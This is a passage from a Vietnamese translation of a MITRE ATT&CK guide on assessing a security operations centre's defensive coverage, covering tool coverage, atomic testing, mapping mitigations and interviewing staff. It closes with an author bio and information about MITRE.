Bạn cũng có thể muốn bắt đầu nâng cấp các công cụ của mình. Khi bạn đang phân tích tài liệu, hãy theo dõi bất kỳ mô-đun tùy chọn nào mà bạn có thể sử dụng để tăng phạm vi bao phủ của mình. Nếu bạn tìm thấy bất kỳ mô-đun nào, hãy xem xét những gì cần thiết để kích hoạt nó trên mạng của bạn và cân nhắc điều này với phạm vi bao phủ mà nó cung cấp.

Nếu bạn không thể tìm thấy bất kỳ mô-đun bổ sung nào cho các công cụ của mình, bạn cũng có thể thử sử dụng chúng làm nguồn dữ liệu thay thế. Ví dụ, bạn có thể không thể cài đặt

Sysmon trên mỗi điểm cuối của mình, nhưng phần mềm hiện có của bạn có thể chuyển tiếp các nhật ký liên quan mà bạn có thể không có quyền truy cập theo cách khác.

Chuyển lên cấp độ tiếp theo: Khi bạn bắt đầu thực hiện một số thay đổi này và cải thiện phạm vi bao phủ của mình, bước tiếp theo là giới thiệu mô phỏng kẻ tấn công, và đặc biệt là kiểm tra nguyên tử. Mỗi khi bạn tạo mẫu một phân tích mới, hãy chạy một bài kiểm tra nguyên tử phù hợp và xem liệu bạn có bắt được nó không. Nếu bạn làm được, tuyệt! Nếu bạn không làm được, hãy xem những gì bạn đã bỏ lỡ và tinh chỉnh phân tích của bạn cho phù hợp. Bạn cũng có thể xem bài báo của chúng tôi về Tìm kiếm mối đe dọa mạng với phân tích dựa trên ATT&CK để được hướng dẫn thêm về quy trình này.

CẤP ĐỘ 3

Đối với những người có đội ngũ tiên tiến hơn, một cách tuyệt vời mà bạn có thể tăng cường đánh giá của mình là bao gồm các biện pháp giảm thiểu. Điều này giúp chuyển đánh giá của bạn từ việc chỉ nhìn vào các công cụ và phân tích và những gì chúng đang phát hiện sang việc xem xét SOC của bạn như một tổng thể.

Một cách tốt để xác định cách bạn đang giảm thiểu các kỹ thuật là xem xét từng chính sách SOC, công cụ phòng ngừa và kiểm soát bảo mật của bạn, sau đó ánh xạ chúng vào (các) kỹ thuật ATT&CK mà chúng có thể ảnh hưởng, và sau đó thêm các kỹ thuật đó vào bản đồ nhiệt phạm vi bao phủ của bạn. Việc cơ cấu lại các biện pháp giảm thiểu gần đây của chúng tôi cho phép bạn xem xét từng biện pháp giảm thiểu và xem các kỹ thuật được ánh xạ với nó. Một số ví dụ về các kỹ thuật có biện pháp giảm thiểu bao gồm:

Tấn công vét cạn có thể được giảm thiểu bằng các chính sách khóa tài khoản. Triển khai Credential Guard trên các hệ thống Windows 10 có thể làm cho Credential Dumping khó khăn hơn. Một tài khoản quản trị viên cục bộ được tăng cường có thể ngăn chặn Windows Admin Shares. Tận dụng các quy tắc Giảm thiểu bề mặt tấn công của Microsoft EMET có thể làm cho việc sử dụng

RunDLL32 khó khăn hơn.

CÁC BIỆN PHÁP GIẢM THIỂU CHO TẤN CÔNG VÉT CẠN (TRÁI) VÀ WINDOWS ADMIN SHARES (PHẢI)

Một cách khác để mở rộng đánh giá của bạn là phỏng vấn – hoặc trò chuyện không chính thức với – những người khác làm việc trong SOC của bạn. Điều này có thể giúp bạn hiểu rõ hơn về cách các công cụ của bạn đang được sử dụng, cũng như làm nổi bật những khoảng trống và điểm mạnh mà bạn có thể không xem xét.

Một số câu hỏi ví dụ bạn có thể muốn hỏi bao gồm:

Bạn sử dụng những công cụ nào thường xuyên nhất? Điểm mạnh và điểm yếu của chúng là gì? Những nguồn dữ liệu nào bạn không thể nhìn thấy mà bạn ước có thể nhìn thấy? Đâu là những điểm mạnh và điểm yếu lớn nhất của bạn từ góc độ phát hiện?

Câu trả lời cho những câu hỏi này có thể giúp bạn bổ sung cho các bản đồ nhiệt mà bạn đã tạo trước đó.

Ví dụ: Nếu trước đây bạn tìm thấy một công cụ có rất nhiều khả năng liên quan đến ATT&CK, nhưng nhân viên chỉ đang sử dụng nó để giám sát Windows Registry, thì bạn nên sửa đổi bản đồ nhiệt của công cụ đó để phản ánh tốt hơn cách nó đang được sử dụng.

Khi bạn nói chuyện với đồng nghiệp, hãy xem xét các bản đồ nhiệt công cụ mà bạn đã tạo trước đó. Nếu bạn vẫn không hài lòng với phạm vi bao phủ mà các công cụ của bạn đang cung cấp, có thể cần thiết để đánh giá các công cụ mới. Hãy tạo một bản đồ nhiệt về phạm vi bao phủ cho mỗi công cụ tiềm năng mới và xem việc thêm nó sẽ giúp tăng cường phạm vi bao phủ của bạn như thế nào.

Mẹo: Nếu bạn có đặc biệt nhiều tài nguyên, bạn có thể thiết lập một môi trường thử nghiệm đại diện để kiểm tra công cụ trực tiếp, ghi lại nơi nó hoạt động tốt và nơi nó không hoạt động tốt, và nó sẽ ảnh hưởng như thế nào đến phạm vi bao phủ hiện tại của bạn.

Cuối cùng, bạn có thể giảm sự phụ thuộc vào các công cụ và phân tích bằng cách triển khai nhiều biện pháp giảm thiểu hơn. Hãy xem xét các biện pháp giảm thiểu trong ATT&CK để đánh giá xem bạn có thể thực hiện chúng một cách thực tế hay không. Tham khảo bản đồ nhiệt phát hiện của bạn như một phần của quá trình này; nếu có một biện pháp giảm thiểu chi phí cao sẽ ngăn chặn một kỹ thuật mà bạn đang làm tốt việc phát hiện, nó có thể không phải là một sự đánh đổi tốt.

Mặt khác, nếu có các biện pháp giảm thiểu chi phí thấp mà bạn có thể thực hiện cho các kỹ thuật mà bạn đang gặp khó khăn trong việc viết phân tích, thì việc thực hiện chúng có thể là một cách sử dụng tài nguyên tốt.

Mẹo: Luôn cân nhắc khả năng mất khả năng hiển thị khi điều tra việc loại bỏ các phát hiện để ủng hộ các biện pháp giảm thiểu. Hãy đảm bảo bạn có một số khả năng hiển thị trong các trường hợp một biện pháp giảm thiểu hoặc kiểm soát có thể bị bỏ qua để những sự kiện đó ít có khả năng bị bỏ lỡ. Phát hiện và giảm thiểu nên được sử dụng cả hai như các công cụ để có phạm vi bao phủ hiệu quả.

TÓM TẮT

Đánh giá khả năng phòng thủ của bạn và hướng dẫn kỹ thuật của bạn có thể là một cách tuyệt vời để bắt đầu với ATT&CK. Chạy một đánh giá cung cấp cho bạn sự hiểu biết về phạm vi bao phủ hiện tại của bạn là gì, mà bạn có thể bổ sung bằng tình báo về mối đe dọa để ưu tiên các khoảng trống, và sau đó sử dụng để điều chỉnh các biện pháp phòng thủ hiện có của bạn bằng cách viết phân tích.

Về lâu dài, bạn không nên hình dung mình đang chạy một đánh giá mỗi tuần, hoặc thậm chí mỗi tháng. Thay vào đó, bạn nên theo dõi liên tục về đánh giá cuối cùng của mình là gì, cập nhật nó mỗi khi bạn nhận được thông tin mới, và định kỳ chạy các bài tập mô phỏng kẻ tấn công để kiểm tra ngẫu nhiên kết quả của bạn.

Theo thời gian, những thay đổi trong mạng và những gì được thu thập có thể có những hậu quả không mong muốn làm giảm hiệu quả của các biện pháp phòng thủ đã được kiểm tra trước đó. Bằng cách tận dụng ATT&CK để chỉ ra cách các biện pháp phòng thủ của bạn đối phó với các mối đe dọa thực sự, bạn sẽ có thể hiểu rõ hơn về tư thế phòng thủ của mình và ưu tiên các cải tiến của mình.

John Wunder là kỹ sư an ninh mạng chính tại MITRE, nơi anh làm việc về các hoạt động phòng thủ, săn lùng mối đe dọa và phân tích cho dự án ATT&CK và các nhà tài trợ của MITRE. Anh là một trong những người duy trì Kho lưu trữ phân tích mạng và là trưởng nhóm cho ATT&CK Sightings. Trước đây, anh là biên tập viên của đặc tả STIX 2.0.

VỀ MITRE ATT&CK

MITRE ATT&CK™ là một cơ sở kiến thức toàn cầu có thể truy cập về chiến thuật và kỹ thuật của kẻ tấn công dựa trên các quan sát thực tế. Cơ sở kiến thức ATT&CK được sử dụng làm nền tảng cho việc phát triển các mô hình và phương pháp luận về mối đe dọa cụ thể trong khu vực tư nhân, trong chính phủ và trong cộng đồng sản phẩm và dịch vụ an ninh mạng. Với việc tạo ra ATT&CK, MITRE đang thực hiện sứ mệnh giải quyết các vấn đề cho một thế giới an toàn hơn – bằng cách tập hợp các cộng đồng lại với nhau để phát triển an ninh mạng hiệu quả hơn. ATT&CK có sẵn và miễn phí cho bất kỳ ai hoặc tổ chức nào sử dụng.

Tìm hiểu thêm tại attack.mitre.org.

VỀ MITRE

Các nhóm định hướng sứ mệnh của MITRE được dành riêng để giải quyết các vấn đề cho một thế giới an toàn hơn. Thông qua các quan hệ đối tác công-tư, cũng như việc vận hành các trung tâm R&D được liên bang tài trợ, chúng tôi làm việc trong toàn bộ chính phủ để giải quyết những thách thức đối với sự an toàn, ổn định và hạnh phúc của quốc gia chúng ta. Tìm hiểu thêm tại www.mitre.org.

MITRE ATT&CK™ và ATT&CK™ là thương hiệu của The MITRE Corporation.

https://itpro.edu.vn/cac-khoa-hoc-an-toan-thong-tin-khoa-hoc-may-tinh-quoc-te

Thịnh hành